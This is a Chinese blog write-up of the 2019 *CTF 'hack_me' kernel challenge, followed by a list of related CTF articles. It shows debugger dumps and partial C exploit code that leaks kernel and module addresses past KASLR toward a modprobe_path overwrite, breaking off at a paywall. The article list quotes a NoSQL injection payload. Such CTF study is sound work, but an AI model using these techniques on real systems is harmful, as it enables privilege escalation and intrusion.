2019 *CTF hack_me

利用内核漏洞实现任意读写:CTF挑战解析
最新推荐文章于 2023-08-09 20:35:35 发布
原创 最新推荐文章于 2023-08-09 20:35:35 发布 · 880 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #安全 #pwn #linux

本文详细介绍了如何利用内核模块的内存漏洞进行任意地址读写,包括分析内核保护机制、泄露内核及模块地址、构造payload实现内存操控。通过调试和实验,展示了如何绕过kaslr并最终获取flag的过程,揭示了内核安全的重要性。

题目

2019 *CTF hack_me

保护

$ checksec ./hackme.ko
[*] '/home/hnhuangjingyu/hackme/hackme.ko'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x0)
-----------------------------------------------------------------------------------------------
$ strings vmlinux| grep "gcc"
%s version %s (hzshang@ub18) (gcc version 7.3.0 (Ubuntu 7.3.0-27ubuntu1~18.04)) %s
Linux version 4.20.13 (hzshang@ub18) (gcc version 7.3.0 (Ubuntu 7.3.0-27ubuntu1~18.04)) #10 Fri Mar 1 11:53:51 CST 2019
-----------------------------------------------------------------------------------------------
$ cat startvm.sh
qemu-system-x86_64 \
    -m 256M \
    -nographic \
    -kernel bzImage \
    -append 'console=ttyS0 loglevel=3 oops=panic panic=1 kaslr' \
    -monitor /dev/null \
    -initrd initramfs.cpio \
    -smp cores=4,threads=2 \
    -s \
    -cpu qemu64,smep,smap 2>/dev/null
-----------------------------------------------------------------------------------------------
$ cat rootfs/etc/init.d/rcS
#!/bin/sh

mount -t proc none /proc
mount -t devtmpfs none /dev
mkdir /dev/pts
mount /dev/pts

insmod /home/pwn/hackme.ko
chmod 644 /dev/hackme

echo 1 > /proc/sys/kernel/dmesg_restrict
echo 1 > /proc/sys/kernel/kptr_restrict

cd /home/pwn
chown -R 1000:1000 .

cd ../..

setsid cttyhack setuidgid 1000 sh

umount /proc
#poweroff -f
  • linux-4.20.13
  • ko只开了nx
  • 内核开启了kaslr、smep、smap

分析

在这里插入图片描述

在这里插入图片描述

思维导图

在这里插入图片描述

实现的功能类似堆题的菜单题

思路

其中offset可以写入负数从而读取堆地址前面的内容,这题其实没有什么代码漏洞,当时还找了挺久的代码逻辑漏洞,发现没有,相同的大小堆块(slab-object)在释放后会重新回到freelist表中,后面申请相同大小的堆块会重新分配出来当时做题目的时候不知道这里概念,虽然研究过slab分配的原理,堆块释放后会重新回到freelist,但是没想到它就放在fd指针处,这里还是得实际调试才能发现到。。。。有点菜。。。

那么就很容易了,题目有kaslr需要泄漏模块地址,在发现modprobe_path方式获取flag后回不去。。其他方法原理掌握了该题的任意读写姿势就都差不多,,,因为要使用modprobe_path所以需要泄漏内核地址

为了方便调试先将kaslr关闭和开启root权限,在申请了一个堆块后

方法声明:

struct buf{
   
   
    size_t idx;
    char *buf;
    size_t size;
    size_t offset;
}mem;

int fd;

void add(long idx , char * buf , long size);
void edit(long idx , char * buf , long size, long offset);
void dele(long idx);
void show(long idx , char * buf , long size, long offset);
void loadFoot();
void leak();

main:

//----------------exp-------------------------
add(0,"0",0x100);
//----------------pool地址-------------------------
0xffffffffc0002400│+0x0000   0xffff888000179400 //分配到的slab-obj指针
0xffffffffc0002408│+0x0008   0x0000000000000100 //size
0xffffffffc0002410│+0x0010   0x0000000000000000
0xffffffffc0002418│+0x0018   0x0000000000000000
//----------------内存数据-------------------------
gef➤  telescope 0xffff888000179400
0xffff888000179400│+0x0000: 0x257830203e2d0030  →  0x257830203e2d0030
0xffff888000179408│+0x0008: 0x6b6d000a20786c6c  →  0x6b6d000a20786c6c
0xffff888000179410│+0x0010: 0x706d7420726964  →  0x706d7420726964
0xffff888000179418│+0x0018: 0x6863650000000000  →  0x6863650000000000
0xffff888000179420│+0x0020: 0x232720656e2d206f  →  0x232720656e2d206f
0xffff888000179428│+0x0028: 0x68732f6e69622f21  →  0x68732f6e69622f21
0xffff888000179430│+0x0030: 0x2f6e69622f0a2020  →  0x2f6e69622f0a2020
0xffff888000179438│+0x0038: 0x67616c662f207063  →  0x67616c662f207063
0xffff888000179440│+0x0040: 0x6c662f706d742f20  →  0x6c662f706d742f20
0xffff888000179448│+0x0048: 0x69622f0a20206761  →  0x69622f0a20206761
//因为向后只能读取0x100的内存,且后面的0x100内存数据都是字符串数据,所以向前偏移0x100看看数据,如下:
gef➤  telescope 0xffff888000179400-0x100
0xffff888000179300│+0x0000: 0xffff888000179378  →  0xffff8880001793f8  →  0x00000000797470 
0xffff888000179308│+0x0008: 0x00000100000000  →  0x00000100000000
0xffff888000179310│+0x0010: 0x00000000000001  →  0x00000000000001
0xffff888000179318│+0x0018: 0x00000000000000  →  0x00000000000000
0xffff888000179320│+0x0020: 0xffff888000179378  →  0xffff8880001793f8  →  0x00000000797470 
0xffff888000179328│+0x0028: 0xffffffff81849ae0  →  0x00000000000000  →  0x00000000000000
0xffff888000179330│+0x0030: 0xffffffff81849ae0  →  0x00000000000000  →  0x00000000000000
//可以看到这里有个内核地址0xffffffff81849ae0

有了内核地址在计算出modprobe_path的偏移即可得到modprobe_path的地址

size_t modprobe_path;

    add(0,"0",0x100);
    size_t buf[0x100 / 8] = {
   
   0};
    show(0,buf,sizeof buf,- sizeof buf);//向前读0x100的内存
    for(int i = 0 ;i < sizeof(buf) ; i++){
   
   
        if(buf[i] >> 4*8 == 0xffffffff){
   
   
            modprobe_path = buf[i] - (0xffffffff81849ae0 - 0xffffffff8183f960);
            printf("kernel -> 0x%llx \n",buf[i]);
            printf("modprobe_path -> 0x%llx \n",modprobe_path);
            break;
        }
    }
}

现在还需要泄漏模块设备地址,因为show对pool[idx]的长度没有限制,那么看看pool里的内容

//可以看到冲偏移为0xc00后的地址开始出现了数据,且有没开kaslr时的模块地址0xffffffffc0000000、0xffffffffc0002000
gef➤  telescope 0xffffffffc0002400+0xc00
0xffffffffc0003000│+0x0000: 0x00005500000000  →  0x00005500000000
0xffffffffc0003008│+0x0008: 0x00000000000000  →  0x00000000000000
0xffffffffc0003010│+0x0010: 0x00000000000000  →  0x00000000000000
0xffffffffc0003018│+0x0018: 0x02007400000001  →  0x02007400000001
0xffffffffc0003020│+0x0020: 0xffffffffc0000000  →  0x54415541e5894855  →  0x54415541e5894855
0xffffffffc0003028│+0x0028: 0x0000000000016f  →  0x0000000000016f
0xffffffffc0003030│+0x0030: 0x0800640000000e  →  0x0800640000000e
0xffffffffc0003038│+0x0038: 0xffffffffc0002000  →  0x0000000000003a  →  0x0000000000003a
0xffffffffc0003040│+0x0040: 0x00000000000050  →  0x00000000000050
0xffffffffc0003048│+0x0048: 0x08006400000013  →  0x08006400000013
//而因为show模块读取的数据是一个指针层级关系,所以需要指针指向的地址为模块地址,那么在0xc50处即有这么一块
gef➤  telescope 0xffffffffc0002400+0xc50
0xffffffffc0003050│+0x0000: 0xffffffffc0002060  →  0xffffffffc0002180  →  0x00000000000000

那么就可以进行泄漏地址了

size_t modprobe_path , mod_addr;
void leak(){
   
   
    add(0,"0",0x100);
    size_t buf[0x100 / 8] = {
   
   0};
    show(0,buf,sizeof buf,- sizeof buf);//向前读0x100的内存
    for(int i = 0 ;i < sizeof(buf) ; i++){
   
   
        if(buf[i] >> 4*8 == 0xffffffff
最低0.47元/天 解锁文章
[GKCTF 2021]hackme
cjdgg的博客
11-21 2689
[GKCTF 2021]hackme 进入题目后,题目如上所示,查看页面源代码 提示nosql,这里推荐WHOAMI大佬的文章 这里源代码我们也看到了php头,那我们就看大佬文章里php中的nosql注入部分就行 这里数据包是json格式,我们试一下重言式注入 被过滤了,提示也说了,可以用Unicode绕过 成功绕过,这里放的是ne,意思为不等于,可以再试试eq,我把用户名的换成了eq,可以看到这个报错,应该是用户名对了,密码不对(ne和eq前面要有$符号的,csdn不知道为啥写不出来) 既然如此
逆向攻防世界CTF系列32-hackme
LH1013886337的博客
11-15 303
v16就是我们的输入,v10没有说,可以猜出来是下标,追踪byte_6B4270
starctf 2019 hackme
weixin_46483787的博客
04-19 2666
学kernel的第四天 解包之后发现init是空的,好怪哦 接下来分析ko文件,可以看到只实现了一个ioctl比较有用 首先是与用户态交互,交互方式是每次32字节,可以看做一个结构体 struct io { dword idx dword padding qword buf qword len qword offset } 然后实现了增删读写四个功能 在读写的时候进行了怎样的操作我们来观察一下: 首先会根据传入的结构体中的idx来确定对哪个chunk进行操作,然后根据offset来确定要读写
xctf hackme
weixin_45701079的博客
10-16 502
xctf hackme linux执行文件,话不多说直接ida 找到main函数,不会的先查字符串,然后找函数,这个就不教了。 看图 主要逻辑就是在循环里,这个代码逻辑还是比较简单的,循环找v17, 然后异或,我刚开始也认为很简单,但是有小细节要注意, 注意 注意 注意 重要的事说三遍 看v13的数据类型,是一字节,v17是四字节类型,之后的结果要&0xff,(这个我开始也忘了,导致得不到结果,看了其他大佬的wp才明白) 最后贴上自己的wp a = [ 0x5F, 0xF2, 0x5E,
CTF-hackme-Misc-slow-解题记录
逐鹿
10-24 559
题目: nc hackme.inndy.tw 7708 OMG, It's slow. 解题步骤 本题采用的是时序攻击,第一次见这种题目,也是参靠了别人的代码做出来的 具体原理就是用你输入的flag和数据库中的从第一位开始比对,比对到错误的那一位直接退出。 假设每比对一位的耗时是1s,正确的flag前五位一定是FLAG{ 当输入FLAG{_}时,如果耗时6s,说明第六位_是错的,因为比对到_就退出了,如果耗时7s,则说明_是对的,因为比对到第7位}才退出 利用这种原理,可以一位位的破解出flag 此题及
BUUCTF pwn wp 96 - 100
fa1c4的blog
02-23 883
axb_2019_heap axb_2019_heap(master*)$ file axb_2019_heap;checksec axb_2019_heap axb_2019_heap: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=bdd2a0e3
web-ctf总结】ctf_BUUCTF_web_总结(待更新)
一个努力生活的人的博客
05-12 1035
ctf_web
Rhme-2017:Riscure Hack Me嵌入式硬件CTF 2017-2018
05-16
**Rhme-2017: Riscure Hack Me 嵌入式硬件 CTF 2017-2018** 这篇文章将探讨Riscure Hack Me在2017-2018年举办的嵌入式硬件CTF(Capture The Flag)挑战赛。CTF是一种网络安全竞赛,参赛者通过解决各种技术问题来...
hackme ctf-re
qq_43605837的博客
04-26 458
hackme总结: 首先得到反编译的代码就很简单: __int64 sub_400F8E() { char v1[136]; // [rsp+10h] [rbp-B0h] int v2; // [rsp+98h] [rbp-28h] char v3; // [rsp+9Fh] [rbp-21h] int v4; // [rsp+A0h] [rbp-20h] unsigned _...
2021GKCTF-hackme
unexpectedthing的博客
07-13 918
GKCTF-hackme
CTF:我的CTF [Capture The Flag]笔记的集合。 这些CTF包括TryHackMe [THM],HackTheBox [HTB]和ETC [等等,所有其他CTF也在此处列出]。 该存储库还包括King of the Hill活动
05-13
周大福 我的CTF [Capture The Flag]笔记的集合。 这些CTF包括TryHackMe [THM],HackTheBox [HTB]和ETC [等等,所有其他CTF也在此处列出]。 该存储库还包括King Of The Hill事件。
XCTF-攻防世界CTF平台-Reverse逆向类——31、hackme
Onlyone_1314的博客
08-27 983
先用ExeinfoPE查壳查看文件信息: 是Linux ELF 64位文件,没有加壳 然后用IDA64打开文件,打开字符串窗口: 可以看到“Give me the password:”、“Congras\n”、“Oh no!\n”字符串,可能是程序输出的字符串,双击 “Give me the password:”找到它在数据段中存储的位置: 选中aGiveMeThePassw按X快捷键,找到使用该变量的地方: 跳转到函数中使用aGiveMeThePassw变量的地方: 尝试按F5反编译代码: 我
CTF平台搭建:CanHackMe
qq_45434762的博客
01-10 947
世间上的相遇都是久别重逢CanHackMe平台介绍 一个基于 php 的 CTF 开源平台。官网:https://canhack.me/项目地址:https://github.com/s...
jarvisoj pwn smashes (2015 32c3-ctf hackme) [Stack Smash]
ACdream
02-07 721
题目链接: https://www.jarvisoj.com/challenges 题目bin文件来源: github - ctfswriteup - 2015 - 32c3ctf - pwn - hackme   分析过程: 开启了NX与Canary 程序流程: 输入名字之后,即可输入一个地址去覆盖flag~这里涉及的知识点是:Stack Smash 当程序开启了Can...
gkctf2021hackme
weixin_44805159的博客
10-10 682
title: gkctf2021hackme typora-copy-images-to: gkctf2021hackme date: 2021-10-10 00:02:59 tags: [渗透测试, ctf, weblogic, 内网穿透] 进入题目,出现的是一个登录框:查看源码后提 示:怀疑是Nosql注入,尝试登录,查看数据包是json传输:burp抓包,构造永真式登录: {"username":{"$ne":1},"password": {"$ne":1}} 发现被检测了,根据提示一:使用uni.
XCTFhackme
recordliu的博客
01-16 643
总结 写代码时注意类型值的范围,防止超出范围导致结果或者运行异常。 逆向开始 不是exe文件,记事本打开一下,发现是elf linux文件。 无法载入OD,选择直接拖入ida64位 文件略大,直接按shift+f12进入字符串。 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200116081429862.png?x-oss-process=image/w...
Hackme CTF】Misc--corgi can fly
VZZmieshenquan的博客
04-21 986
Description: Corgi is cute, right? Pillow (Python) and Bitmap (.NET) are your friends. (Maybe you can try stegsolve) Solution: 点击链接后加载出一张图,下载下来 用stegsolve查看图片,发现一张二维码 扫描二维码获得flag Flag: FLAG{C...
CTF-Anubis HackTheBox 渗透测试(二)
梅花寺
08-09 537
Anubis是由作者4ndr34z在HackTheBox平台上设计,难度相对较高的靶场。该靶场知识点内容涵盖上传ASP webshell、突破容器、然后在jamovi 中利用 XSS漏洞获取用户帐户并最终针对 ADCS(Active Directory 证书服务)进行权限升级的利用的真实场景。
hackme web wp(全)
zhwho的博客
04-07 1465
HackmeCTF—WP WEB 1.hide and seek 根据题目意思猜测网页源代码里可能会有 提示,右键查看网页源代码,发现flag 2.guestbook 看到no data,点击new post可以插入新的数据,然后再回到message list可以看到刚才插入的数据,点进去阅读,看到可疑的URL:?mod=read&id=152如图2.1 图2.1 尝试SQL注入 首先...
ctf刷题学习网站
最新发布
03-29
**Try Hack Me** - 地址: [https://tryhackme.com](https://tryhackme.com) - 简介: 类似于HackTheBox,它专注于教育目的而构建场景化实验室,有详细的教程指导新玩家完成挑战。 --- 如果你刚开始接触CTF,建议...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值